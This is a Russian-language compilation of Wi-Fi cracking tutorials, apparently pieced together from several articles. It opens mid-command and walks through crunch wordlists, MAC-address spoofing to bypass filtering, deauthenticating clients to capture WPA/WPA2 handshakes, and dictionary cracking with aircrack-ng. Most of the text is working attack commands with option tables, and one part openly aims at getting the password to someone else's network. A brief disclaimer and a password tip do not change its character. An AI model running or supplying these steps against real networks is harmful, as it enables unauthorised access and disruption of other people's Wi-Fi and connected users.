john —restore=foo | aircrack-ng -w — -b 00:11:22:33:44:55 WPA.cap

Создание своих словарей.

При атаках типа брутфорс словари играют очень важную роль. Я думаю вы с легкость найдете в интернете куча всяких не понятных словарей. Но еще можно и нужно  делать самому.

Для этого в дистрибутиве Kali Linux есть интересная утилита, называется Crunch. Синтаксис ее довольно прост:

  • min = минимальная длина пароля;
  • max = максимальная длина;
  • characterset = символы, которые будут использоваться для генерации паролей;
  • -t = возможность создавать паттерны. Давай на примере. Скажем, ты знаешь, что у человека день рождения 28 июля и эти цифры есть в пароле вида 0728, но перед этим числом есть еще какие-то символы. Поэтому ты пишешь что-то вроде @@@@@@@0728, и получается, что лист будет сгенерирован на 11 -значный пароль. Семь символов, которые будут генериться, а четыре будут фиксированными. По мне, так весьма крутая и удобная фишка;
  • -о = выходной файл для нашего листа.
  • -p = перестановка.
  • -d — ограничение числа последовательно одинаковых символов.

crunch 4 8

Как сам понимаешь, кранч будет генерить пароли от 4 до 8 символов. Как видишь, ничего сложного, теперь давай что-нибудь поинтереснее:

crunch 6 8 1234567890 -о /гооt/wordlist.txt

Здесь будет сгенерирован словарь от 6 до 8 символов, в пароле только цифры и зальются они во внешний файл, что мы указали. Остается только воспользоваться получившимся словарем.

crunch 1 1 -p Alex Company Position

Словарь состоит из всех возможных комбинаций слов Alex, Company и Position.

Для тега -t есть шаблоны :

  • ^ — спецсимволы.
  • @ — буквы в нижнем регистре.
  • , — буквы в верхнем регистре.
  • % — цифры.

Обход фильтра MAC адреса.

Иногда в точках доступа включают фильтрации по пользователе по MAC. Так вот, это совсем бесполезна штука.

В Linux системах вы можете свободно поменять ваш МАС адрес на любой:

ifconfig wlan0 downifconfig wlan0 hw ether 00:11:22:AA:AA:AAifconfig wlan0 up

Предварительно нужно отключить любые mon-интерфейсы. Проверить, заработала ли подмена, можно вызвав ifconfig wlan0 — в строке Hwaddr должен быть указанный выше MAC.

Кроме того, в *nix есть macchanger — с его помощью можно выставить себе случайный MAC. Если поставить его в init.d, то неприятель будет совершенно сбит с толку, так как при каждой загрузке наш MAC будет другим (работает для любых проводных и беспроводных адаптеров, как и ifconfig).

# Случайный MAC:macchanger -r wlan0 # Определённый MAC:

macchanger -m 11:22:33:AA:BB:CC wlan0

# Показать MAC:

macchanger -s wlan0

Как пользоваться aircrack-ng. WPA и WPA2

В наши дни беспроводные сети используются все чаще и чаще, уже в каждом доме где есть интернет, есть и роутер для раздачи Wifi на мобильные устройства и другие гаджеты. Интернет и Wifi стали неотъемлемой частью нашей жизни. Но остался вопрос о безопасности таких сетей. Как показывает история люди всегда находили способы взломать сети, и прекрасное тому подтверждение — протокол WEP, который поддавался взлому буквально за несколько минут, даже при отсутствии подключенных к сети пользователей.

Но, похоже, достучались, люди все реже используют WEP и защищают свои сети с помощью более современных стандартов таких как WPA и WPA2. Но действительно ли они безоговорочно безопасны? В этой статье мы рассмотрим как пользоваться утилитой Aircrack-ng для тестирования безопасности сетей WPA и WPA2. Вы увидите в чем их слабое место и узнаете как защитить себя от взлома.

Что такое Aircrack-ng?

Aircrack-ng — это набор утилит для тестирования безопасности Wifi сетей. Он был разработан группой специалистов с информационной безопасности и в него входят несколько утилит для сканирования сети, передачи пакетов в сеть, настройки интерфейса и непосредственно, перебора пароля. Программы поддерживают взлом WPA, так и WEP сетей.

В пакет Aircrak входит большое количество утилит, но мы рассмотрим только самые основные:

  • airodump-ng — сканирование сети и захват пакетов которые были отправлены в эфир;
  • airmon-ng — переключение сетевого интерфейса в режим мониторинга для приема всех пакетов, которые есть в сети;
  • wesside-ng — утилита для автоматического взлома WEP использует атаку типа PTW;
  • easside-ng — утилита для автоматического взлома WEP с помощью перебора ключа на основе векторов инициализации;
  • besside-ng — автоматический взлом сетей WEP и перехват handshake для WPA;
  • airolib-ng — утилита для управления списком точек доступа и паролей;
  • airbase-ng — универсальная утилита для выполнения различных атак на сети Wifi, находится в разработке;
  • tkiptun-ng — утилита для взлома WPA TKIP;
  • airdecap-ng — утилита для расшифровки перехваченного трафика, работает только при наличии ключа;
  • airdrop-ng  — выполняет деаутентификацию пользователей;
  • aireplay-ng — позволяет генерировать трафик внутри Wifi сети.

В этой статье мы будем использовать только некоторые из этих утилит. А именно airodump, airmon, aircrhack и besside для попытки автоматического взлома.

Как будет работать атака на WPA/WPA2?

Как я уже говорил протокол шифрования беспроводных сетей WPA тоже имеет свои недочеты. Но большинство из них усугубляет именно пользователь. Если не учитывать недавно открытую уязвимость в работе WPA TKIP, то все остальные проблемы возникают из-за слабого пароля.

Для нашей тестовой атаки будем использовать собственную сеть. Предполагается, что вы к ней не подключены. Рассмотрим в чем состоит суть атаки. Для того чтобы подключиться к сети каждый клиент должен пройти процесс аутентификации с роутером. Я не буду вдаваться в подробности, но между клиентом и маршрутизатором выполняются четыре проверки подлинности на основе MAC адреса, ключа и случайных чисел, если мы их перехватим, то сможем уже на локальном компьютере попробовать перебрать подходящий пароль уже на локальном компьютере.

Суть метода в том, что скорость перебора на компьютере будет намного быстрее, чем при ручной проверке, она будет достигать до 1000 паролей в секунду, а при использовании очень простого и ожидаемого пароля, его можно очень быстро перебрать.

Сначала мы переведем устройство в режим монитора с помощью airmon-ng, затем будем перехватывать все пакеты от этой сети с помощью airodump-ng пока не найдем рукопожатие, затем останется перебрать пароль по словарю с помощью aircrack. А теперь перейдем ближе к практике и рассмотрим насколько просто перебрать ваш пароль если он достаточно простой.

Как пользоваться Aircrack-ng для взлома WPA

Дальше рассмотрим как пользоваться aircrack-ng. Если программа еще не установлена на вашем компьютере, то в Linux вы можете скачать ее из официальных репозиториев. В Ubuntu:

sudo apt install aircrack-ng

А в Red Hat / CentOS:

sudo yum install aircrack-ng

Windows вам придется загрузить установщик из официального сайта. После установки первым делом нужно сделать чтобы нам ничего не мешало. Для этого отключите все сервисы, которые управляют Wifi и тем более отключитесь от Wifi сети, если вы к ней подключены. Если запущен NetworkManager, его нужно отключить:

sudo systemctl stop NetworkManager

Я предполагаю, что у вас уже установлены все необходимые драйвера и вы готовы к работе. Сначала смотрим подключенные к системе интерфейсы:

sudo ls /sys/class/net/

Обычно имя беспроводного интерфейса начинается на w, например, wlp3s0 или wlan0. У меня это wlp3s0b1. Нам нужно перевести сетевой интерфейс WiFi в режим мониторинга. В этом режиме он может захватывать все пакеты, которые летают в сети и даже если ему они не адресованы ему. Вообще, интерфейс и так захватывает все пакеты, но на программном уровне все пакеты, которые не адресованы этому компьютеру отсеиваются, теперь они не будут отсеиваться. Дальше идет инструкция Aircrack-ng.

Для этого воспользуемся утилитой airmon-ng. Ей нужно передать команду start и имя интерфейса:

sudo airmon-ng start wlp0s0b1

После этого будет создан виртуальный интерфейс, который работает в режиме монитора во второй колонке отображено его имя, у меня это wlp3s0b1mon, хотя часто он называется просто mon0. Если какие-либо программы будут мешать программа выдаст их имена и PID:

Их нужно завершить с помощью kill. Дальше нам нужно просканировать эфир и найти нашу сеть, которую мы собираемся тестировать. Для этого используйте команду airodump-ng. В параметрах ей нужно передать только интерфейс. Обратите внимание, что нужно передавать именно виртуальный интерфейс, который работает в режиме монитора:

sudo airodump-ng -i wlp3s0b1mon

Почти сразу же вы увидите свою сеть, поскольку она расположена ближе всех. У меня это MyPublicWifi423. Из предоставляемой информации нам понадобится ее BSSID и канал, который можно найти в колонке CH. Дальше мы будем использовать ту же самую утилиту, только теперь нацелим ее именно на нашу сеть, чтобы она не отвлекалась на посторонние и поймала все что нам нужно.

Мы зададим канал с помощью опции -с и BSSID роутера с помощью опции —bssid, а также укажем с помощью опции -w куда нужно сохранить перехваченные пакеты для дальнейшей обработки:

sudo airodump-ng -c 11 --bssid 56:0A:64:17:5D:33 -w /home/sergiy/hack.pcap wlp3s0b1mon

Не закрывайте этот терминал, сейчас выполняется захват и как вы можете видеть к нашей сети подключено два пользователя. Их MAC адреса находятся в колонке STATION. Если сейчас один из них отключится и еще раз подключится, то мы получим необходимые для дальнейшего взлома данные.

Мы можем это сделать со своими устройствами, но в реальной сети у хакера не будет такой возможности, поэтому мы можем принудительно отключить клиента от сети с помощью утилиты aireplay. Если передать ей опцию deauth, то она разошлет широковещательное сообщение от имени маршрутизатора, в котором попросит всех отключиться от сети. Нам нужно только передать в параметрах количество пакетов, которые нужно отправить и BSSID роутера:

sudo aireplay-ng --deauth 10 -a 56:0A:64:17:5D:33 wlp3s0b1mon

Сразу после этого вы сразу же увидите, сообщение WPA handshake: 56:0A:64:17:5D:33 в правом верхнем углу терминала. Вы можете использовать и более простой способ для получения Handshake. Утилита besside позволяет выполнить все действия автоматически нужно только передать BSSID роутера и интерфейс монитора:

sudo besside-ng -b 02:C2:C6:46:39:85 wlp3s0b1mon

Этап, связанный с работой в реальной сети завершен и нам осталось только перебрать все возможные пароли по словарю. Дальше рассмотрим как пользоваться Aircrack-ng для перебора паролей.

Словарь — это обычный текстовый документ со списком возможных паролей. Вы можете составить его сами. Команда будет выглядеть следующим образом:

$ sudo aircrack-ng -b BSSID_маршрутизатора -w путь_к_словарю перехваченные_пакеты

sudo aircrack-ng --bssid 56:0A:64:17:5D:33 -w /home/sergiy/words /home/sergiy/hack.pcap-01.cap

Дальше начнется перебор ключей и если ключ, который использовался для защиты сети есть в списке, то он обязательно будет найден:

Как видите, aircrack-ng wpa2 psk достаточно быстро может быть взломан. Скорость перебора паролей достигает тысячи вариантов в секунду, а это значит, что на перебор до 100000 паролей уйдет всего только несколько минут. И это на обычном, бюджетном ноутбуке. На более мощном железе использовать Aircrack-ng будет намного быстрее.

Поэтому никогда не используйте простые пароли, состоящие только из цифр, если вы добавите хоть одну букву или символ, то уменьшите шансы на взлом в несколько раз.

Взлом WPA2-PSK паролей при помощи Aircrack-ng

С возвращением, мои хакеры!

Когда в конце 1990-х годов создавался Wi-Fi, для обеспечения конфиденциальности беспроводной связи был также создан Wired Equivalent Privacy (WEP — «эквивалент проводной конфиденциальности»). WEP, как позже выяснилось, оказался дырявым и был легко взломан. Вы можете узнать об этом больше в нашей статье для начинающих по взлому Wi-Fi.

В качестве замены WEP, для беспроводной безопасности большинство точек доступа теперь использует Wi-Fi Protected Access II с предварительно опубликованным ключом, известным как WPA2-PSK. Он использует более сильный алгоритм шифрования — AES, который взломать очень сложно, но возможно. В нашем руководстве по взлому Wi-Fi для новичков мы также даем об этом больше информации.

Слабостью в системе WPA2-PSK является то, что зашифрованный пароль используется совместно с так называемым 4-сторонним рукопожатием. Когда клиент аутентифицируется в точке доступа, клиент и точка доступа проходят через 4-шаговый процесс для аутентификации пользователя в этой точке. Если мы сможем захватить пароль в это время, то сможем попытаться взломать его.

В этой статье из нашей серии по хакингу Wi-Fi мы рассмотрим использование aircrack-ng и атаку по словарю против зашифрованного пароля после того, как захватим его во время четырехстороннего рукопожатия. Если вы ищете более быстрый способ, то мы предлагаем вам также посмотреть нашу статью о том, как взламывать пароли WPA2-PSK с помощью coWPAtty.

Шаг 1. Переключите Wi-Fi адаптер в режим мониторинга при помощи Airmon-Ng

Начнем с того, что включим беспроводной адаптер в режиме мониторинга.

Читать также:  Как найти точное местоположение любого IP-адреса

Для этого нам нужно будет использовать беспроводной сетевой адаптер, который поддерживает эту функцию. Ознакомьтесь с нашим списком адаптеров беспроводных сетей, поддерживаемых Kali Linux и Backtrack, за 2017 год или можете сразу приобрести самый популярный адаптер для начинающих на амазоне наш самый популярный адаптер для начинающих здесь.

Это похоже на переключение проводного адаптера в так называемый «неразборчивый» режим работы (promiscuous mode), когда сетевая плата принимает все пакеты вне зависимости от того, кому они адресованы. Это позволит нам видеть весь беспроводной трафик, который проходит мимо нас в пространстве. Давайте откроем терминал и введем эту команду:

airmon-ng start wlan0

Обратите внимание, что airmon-ng переименовал ваш адаптер wlan0 в mon0.

Шаг 2. Перехват трафика с помощью Airodump-Ng

Теперь, когда наш беспроводной адаптер находится в режиме мониторинга, у нас есть возможность увидеть весь беспроводной трафик, который проходит рядом с нами. Мы можем перехватить этот трафик, просто используя команду airodump-ng.

Эта команда захватывает весь трафик, который видит Wi-Fi адаптер, и отображает важную информацию о нем, включая BSSID (MAC-адрес точки доступа), мощность, количество фреймов Бикона, количество фреймов данных, канал, скорость, шифрование (если есть) и, наконец, ESSID (то, что большинство из нас называют SSID). Чтобы сделать это, введите в консоли:

airodump-ng mon0

Обратите внимание, что все видимые точки доступа перечислены в верхней части скриншота, а все клиенты указаны в нижней части.

Шаг 3. Фокусировка Airodump-Ng на одной точке доступа на одном канале

Наш следующий шаг — сосредоточить наши усилия на одной точке доступа на одном канале и получить от нее важные данные. Для этого нам нужен BSSID и канал. Давайте откроем еще один терминал и введем следующую команду:

airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0

  • 08:86:30:74:22:76 — это BSSID точки доступа
  • -c 6 — канал, на котором работает точка доступа
  • WPAcrack — это файл, в который вы хотите записать полученную информацию
  • mon0 — это беспроводной адаптер мониторинга

Как вы можете видеть на скриншоте выше, мы теперь сфокусировались на перехвате данных с одной точки доступа с помощью ESSID Belkin276 на канале 6. Belkin276, вероятно, является SSID по умолчанию, которые обычно являются главными целями при Wi-Fi взломе, поскольку пользователи, оставляющие значения ESSID по умолчанию, обычно не заморачиваются с безопасностью своих точек доступа.

Шаг 4. Деаутентификация клиентов при помощи Aireplay-Ng

Чтобы захватить зашифрованный пароль, нам нужно, чтобы клиент аутентифицировался в точке доступа. Если пользователь уже прошел аутентификацию, то мы можем его де-аутентифицировать (разорвав его соединение с точкой доступа), и его система автоматически попытается повторно аутентифицироваться, благодаря чему мы сможем перехватить зашифрованный пароль. Давайте откроем еще один терминал и введем:

aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0

  • 100 — количество фреймов деаутентификации, которые вы хотите отправить
  • 08:86:30:74:22:76 — это BSSID точки доступа
  • mon0 — это беспроводной адаптер для мониторинга

Шаг 5. Перехват «рукопожатия»

На предыдущем шаге мы сбросили соединение пользователя с его собственной точкой доступа, и теперь, когда он повторно аутентифицируется, airodump-ng попытается захватить его пароль в новом 4-стороннем рукопожатии. Вернемся к нашему терминалу airodump-ng и проверим, удалось ли нам добиться успеха.

Обратите внимание, что в верхней строке справа, airodump-ng говорит «WPA рукопожатие». Нам удалось захватить зашифрованный пароль! Это первый шаг к успеху!

Шаг 6: Взлом пароля при помощи Aircrack-Ng

Теперь, когда у нас есть зашифрованный пароль, который мы сохранили в файле WPAcrack, мы можем запустить aircrack-ng для его взлома, используя файл с паролями. Помните, что этот тип атаки настолько же хорош, насколько хорош ваш файл с базой паролей. Мы будем использовать список паролей по умолчанию, включенный в поставку aircrack-ng на BackTrack, который хранится в файле с именем darkcOde.

Попытаемся взломать пароль, открыв другой терминал и набрав:

aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

  • WPAcrack-01.cap — это то имя файла, которое мы написали при вводе команды airodump-ng
  • /pentest/passwords/wordlist/darkc0de — это абсолютный путь к вашему файлу с паролями

Много ли это займет времени?

Этот процесс может быть относительно медленным и нудным. В зависимости от длины вашего списка паролей вы можете ждать от нескольких минут до нескольких дней. На нашем двухъядерном 2,8-гигабайтном процессоре Intel он способен тестировать чуть более 500 паролей в секунду, что составляет около 1,8 миллиона паролей в час. Ваши результаты будут отличаться.

Когда пароль будет подобран, он появится на вашем экране. Помните, что файл паролей имеет решающее значение. Сначала попробуйте файл с паролями по умолчанию, и если с ним у вас ничего не получилось, то перейдите к большому и полному файлу с паролями, например, одному из этих

Словарь для взлома паролей от CrackStation — CrackStation’s Password Cracking Dictionary

Словари паролей от SkullSecurity — Словари паролей SkullSecurity

Приходите за новыми материалами по взлому Wi-Fi

Обязательно возвращайтесь, поскольку мы обещаем публиковать более продвинутые материалы о методах взлома беспроводных сетей. Если вы еще не видели другие статьи по взлому Wi-Fi, то поищите их на нашем сайте. В частности, это касается статьей о взломе WEP с использованием aircrack-ng и о взломе паролей WPA2-PSK с использованием coWPAtty.

Если вы ищете дешевую и удобную платформу, чтобы начать работу с aircrack, то ознакомьтесь с нашей сборкой Kali Linux для Raspberry Pi, использующей платформу Raspberry Pi за 35 долларов.

И как всегда, если у вас есть вопросы по любой из этих тем, пожалуйста, задавайте их в комментариях.

Предыдущие статьи (1 , 2 , 3).

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.

Инструкция к aircrack-ng

     Всем привет! В последующих своих статьях (речь в которых пойдёт про получение пароля к чужому wi-fi) я расскажу об aircrack. Это небольшой набор программ (инструментов) для взлома wi-fi с любым шифрованием (wep,wpa/wpa2). Там я не стану останавливаться на таких моментах как состав моих команд (что означает то слово,буква или какой общий синтаксис). Из этого поста вы сможете восполнить некоторые пробелы и недосказанности которые смогут возникнуть у вас при прочтении следующих статей!

      Aircrack-ng — набор инструментов для взлома 802.11 WEP и WPA/WPA2-PSK ключей. Aircrack-ng способен определить WEP ключ как только будет захвачено достаточное количество пакетов (data) с помощью инструмента airodump-ng. Этот инструмент от aircrack-ng предназначен для выполнения статических атак на беспроводные сети и для обнаружения WEP ключа методом грубого подбора. У вас также есть возможность использовать подбор по словарю. Для взлома WPA/WPA2 pre-shared ключей, нужно использовать только подбор по словарю.

  1. Через PTW атаку. Основное преимущество этого способа, заключается в том, что для взлома WEP ключа необходимо меньше перехваченных пакетов, основной недостаток этого метода это то, что он может работать только с arp пакетами.
  2. Через FMS / KoreK атаки – это способ включает в себя различные статические воздействия (FMS, KoreK, Brute force) для поиска WEP ключа и требует больше пакетов, чем первый метод.
  3. Через использование словаря (word list), этот способ логичнее всего использовать для взлома WPA/WPA2 ключей, так как первый и второй метод не работают для WPA/WPA2 шифрования.

     Какой из трёх способов использовать? Решать вам-всё это индивидуально. От себя скажу,чаще всего вам понадобиться третий способ,т.к. пользователей,использующих wep шифрование всё меньше ,и сейчас их вовсе может не оказаться там,где вам будет нужен wi-fi. Но если такая точка доступа вам всё же попадётся, то используйте второй способ.

     Далее мы разберём следующие программы:aircrack-ng;airdump-ng;airplay-ng.

Синтаксис данной программы выглядит так 

aircrack-ng [options]

     В таблице ниже представлены все возможные параметры для этой программы.(пояснения прилагаются)

optionпараметрописание
-aamodeРежим атаки (1 = статичный WEP, 2 = WPA/WPA2-PSK).
-eessidЕсли установлено, будут использоваться все IVы от сети с указанным ESSID. Эта опция также требуется для подбора WPA/WPA2-PSK если ESSID не широковещательный (скрытый).
-bbssidВыбор целевой сети основанный на MAC адресе точки доступа.
-pnbcpuНа SMP системах: # CPU для использования.
-qnoneВключить «тихий» режим (не выводить статическую информацию пока не будет найден ключ).
-cnone(взлом WEP) Ограничить поиск только алфавитно-цифровыми кодами (0?20 — 0?7F).
-tnone(взлом WEP) Ограничить поиск двоично-десятичными кодами.
-hnone(взлом WEP) Ограничить поиск цифровыми кодами (0?30-0?39) Такие ключи используются по умолчанию на большинстве Fritz!BOXes.
-dstart(взлом WEP) Установить начало ключа WEP (в шестн.) для того чтобы отладить цели.
-mmaddr(взлом WEP) MAC адрес для фильтрации WEP данных. Определите -m ff:ff:ff:ff:ff:ff для использования всех IVs, независимо от сети.
-nnbits(взлом WEP) Установка длинны ключа: 64 для 40-bit WEP, 128 для 104-bit WEP, и т. д. По умолчанию — 128.
-iindex(взлом WEP) Поддерживать только введенный ключевой индекс (1 to 4). Значение по умолчанию — игнорировать ключевой индекс.
-ffudge(взлом WEP) По умолчанию этот параметр установлен в 2 для 104-bit WEP и в 5 для 40-bit WEP. Определяет значение фактора вероятности.
-kkorek(взлом WEP) Есть 17 статических атак KoreKa. Иногда одна атака создает огромное кол-во ложных голосов которые препятствуют нахождению верного ключа даже с большим кол-вом IVов. Попробуйте -k 1, -k 2, … -k 17 для проверки каждого типа атаки выборочно.
-x/-x0none(взлом WEP) Отключает последний брутфорс.
-x1none(взлом WEP) Включает последний брутфорс (по умолчанию).
-x2none(взлом WEP) Включает два последних брутфорса.
-Xnone(взлом WEP) Отключает многопроцессорный брутфорс (только для SMP).
-ynone(взлом WEP) Это экспериментальное нападение которое должно использоваться когда обычный метод терпит неудачу с более чем миллионом IVов
-wwords(взлом WPA) Путь к словарю или «-» без ковычек для стандартного ввода (stdin).

Airodump-ng — программа предназначенная для захвата сырых пакетов протокола 802.11 и особенно подходящая для сбора WEP IVов (Векторов Инициализации) с последующим их использованием в aircrack-ng. Если к вашему компьютеру подсоединен GPS навигатор то airodump-ng способен отмечать координаты точек на картах.

Синтаксис у airodump-ng следующий

airodump-ng  [,,…]

  • -ivs: Сохранять только отловленные IVы. Короткая форма -i.
  • -gpsd: Использовать GPS. Короткая форма -g.
  • -write: Префикс файла дампа. Короткая форма -w.
  • -beacons: Записывать все маяки в файл дампа. Короткая форма -e.
  • -netmask : Фильтровать точки по маске. Короткая форма -m.
  • -bssid : Фильтровать точки по BSSID. Короткая форма -d.
  • -encrypt : Фильтровать точки по типу шифрования. Короткая форма -t 
  • -a: Фильтровать не ассоциированных клиентов

По умолчанию, airodump-ng отслеживает каналы на частоте 2.4Ghz.Вы можете заставить ее отслеживать пакеты на другом/определенном канале используя:—channel : Определить канал. Короткая форма -c.—band :Полоса на которой airodump-ng будет отлавливать пакеты. Короткая форма -b.—cswitch : Установить метод переключения каналов. Короткая форма -s.0: FIFO (по умолчанию)1: Round Robin2: Hop on lastВы можете перевести.cap /.dump в формат.ivs.

Подсказки по отображаемой информации в данной программе:

ПолеОписание
BSSIDMAC адрес точки доступа.
PWRУровень сигнала о котором сообщает карта. Его значение зависит от драйвера, но поскольку уровень становится выше,вы можете определить что находитесь ближе к точке доступа. Если BSSID PWR равен −1, то драйвер не поддерживает уровень сигнала. Если PWR равен −1 для ограниченного числа станций тогда это для пакета который поступил от AP но возможности передачи клиента вне возможностей вашей карты. Значит вы слышите только половину вей сети. Если все клиенты имеют PWR равный −1 драйвер не поддерживает заданный уровень сигнала.
RXQКачество Приема измеренное в процентах от пакетов (управляющие пакеты и пакеты данных) успешно полученных в течении последних 10 секунд. Смотрите примечание для получения более детальной информации.
BeaconsЧисло пакетов объявлений, посланных AP. Каждый пункт доступа посылает приблизительно десять маяков в секунду по самой низкой норме (1M), таким образом их может набираться очень много.
# DataКоличество отловленных пакетов (если WEP, только количество IV), включая широковещательные пакеты.
#/sЧисло пакетов данных за последние 10 секунд.
CHНомер канала (берется из пакетов-маяков).Примечание: иногда airodump-ng захватывает пакеты с других каналов даже если канал строго задан. Это происходит из-за наложения радиочастот.
MBМаксимальная скорость поддерживаемая AP. Если MB = 11, это 802.11b, если MB = 22 это 802.11b+ и если больше то 802.11g. Точка (после того, как выше 54) указывает, что короткая преамбула поддержана.
ENCИспользуемый алгоритм шифрования. OPN = нет шифрования,”WEP?” = WEP или выше (нет нужных данных для выбора между WEP или WPA/WPA2), WEP (без метки вопроса) показывает на статическое или динамическое WEP, и WPA или WPA2 если TKIP или CCMP тоже присутствует.
CIPHERОбнаруженный шифр. Один из CCMP, WRAP, TKIP, WEP, WEP40, или WEP104. Не обязательно, но TKIP обычно используется с WPA, а CCMP обычно с WPA2.
AUTHИспользуемый протокол аутентификации. Один из MGT (WPA/WPA2 использование выделенного сервера аутентификации), PSK (открытый ключ для WEP/ pre-shared ключ для WPA/WPA2), или OPN (открытый для WEP).
ESSIDТак называемый “SSID”, который может быть пустым если скрытие SSID активизировано. В этом случае, airodump-ngпопытается получить SSID исследуя ответы клиентов.
STATIONMAC адрес обнаруженной станции. 
LostЧисло пакетов потерянных за последние 10 секунд. Основывается на требованиях последовательности данных.
PacketsКоличество данных посланных клиентом.
ProbesПроверка ESSIDов по клиентам.

      Aireplay-ng используется для генерации пакетов. Если к беспроводной точке доступа никто не подключен, соответственно нет трафика для захвата и последующего анализа (взлома).

     Основная функция программы заключается в генерации трафика для последующего использования в aircrack-ng для взлома WEP и WPA-PSK ключей. Существуют несколько различных атак, с помощью которых можно совершить: реассоциацию узлов с целью получения данных WPA handshake, поддельные аутентификации, интерактивное повторение пакетов (Interactive packet replay), вручную произвести инжектирование ARP-запросов и повторных ARP-запросов. С помощью инструмента packetforge-ng можно создавать произвольные пакеты.

Использование атак:

  • Атака 0: Реассоциация узлов
  • Атака 1: Фальшивая аутентификация
  • Атака 2: Интерактивная генерация пакетов
  • Атака 3: Повторение ARP запроса
  • Атака 4: KoreK chopchop (быстро-быстро) нападение
  • Атака 5: Фрагментация
  • Атака 6: Кофе-латте атака (Caffe-latte attack) 
  • Атака 7: Клиент-ориентированная фрагментированная атака 
  • Атака 9: Тест инжекции

     Синтаксис команды ниже

aireplay-ng

Параметры фильтрации:

ОпцияПараметрОписание
-bbssidMAC-адрес точки доступа
-ddmacMAC-адрес, адресат
-ssmacMAC-адрес, источник
-mlenМинимальный размер пакета
-nlenМаксимальный размер пакета
-utypeКонтроль кадра, тип поля (type field)
-vsubtКонтроль кадра, подтип поля (subtype field)
-ttodsКонтроль кадра, To DS bit
-ffromdsКонтроль кадра, From DS bit
-wiswepКонтроль кадра, WEP bit

Параметры генерации (повторения) пакетов:

ОпцияПараметрОписание
-xnbppsколичество пакетов в секунду
-pfctrlустановить контрольное слово кадра (hex)
-abssidустановить MAC-адрес точки доступа
-cdmacустановить MAC-адрес Получателя
-hsmacустановить MAC-адрес Источника
-eessidатака «фальшивая аутентификация»: установить SSID (идентификатор сети) точки доступа
-jarpreplay атакагенерация FromDS пакетов
-gзначениеизменить размер кольцевого буфера (по умолчанию: 8)
-kIPустановить IP адрес назначения в фрагментах
-lIPустановить IP адрес источника в фрагментах
-onpcktsколичество пакетов в пачке
-qsecколичество секунд между посылкой keep-alive пакетов (сообщений, подтверждающих активность)
-yprgaпоток ключей (keystream) для авторизации открытым ключем

Режимы атаки (для выбора режима могут быть использованы цифры):

АтакаОписание
--deauth countРеассоциация одной или всех станций (пользователей) 
--fakeauth delayФальшивая аутентификация к точке доступа 
--interactiveИнтерактивный выбор кадров 
--arpreplayСтандартное повторение ARP-запроса 
--chopchopДешифровка/chopchop WEP пакета 
--fragmentГенерирует действительный поток ключей (keystream) 
--testТест инжекции 

Спасибо за внимание! Надеюсь материал был полезен для вас!!! (=


Смотрите также